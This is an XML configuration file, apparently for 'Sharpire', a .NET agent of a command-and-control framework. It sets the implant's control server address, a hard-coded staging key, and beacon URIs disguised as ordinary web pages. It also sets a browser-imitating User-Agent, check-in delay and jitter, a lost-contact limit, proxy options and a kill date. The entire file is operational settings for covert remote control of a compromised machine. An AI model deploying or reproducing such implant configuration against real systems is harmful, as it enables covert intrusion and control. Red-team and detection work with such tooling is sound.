<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <configSections>
        <sectionGroup name="applicationSettings" type="System.Configuration.ApplicationSettingsGroup, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >
            <section name="Sharpire.Properties.Settings" type="System.Configuration.ClientSettingsSection, System, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" requirePermission="false" />
        </sectionGroup>
    </configSections>
	<appSettings>
		<!--For multiple control server split them by commas-->
		<add key="ControlServers" value="http://192.168.0.188:80"/>
		<add key="StagingKey" value="zya{68H)&lt;}uY.(Ml|sFNhoSR79Vqj_Wd"/>
		<add key="AgentLanguage" value="dotnet"/>
		<!--Less Common Manditory Settings-->
		<add key="TaskURIs" value="/admin/get.php,/news.php,/login/process.php"/>
		<add key="UserAgent" value="(Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"/>
		<add key="DefaultJitter" value="0.0"/>
		<add key="DefaultDelay" value="5"/>
		<add key="DefaultLostLimit" value="60"/>
		<!--Optional Settings-->
		<add key="StagerUserAgent" value=""/>
		<add key="StagerURI" value=""/>
		<add key="Proxy" value="default"/>
		<add key="ProxyCreds" value=""/>
		<add key="KillDate" value=""/>
		<add key="WorkingHours" value=""/>
	</appSettings>
</configuration>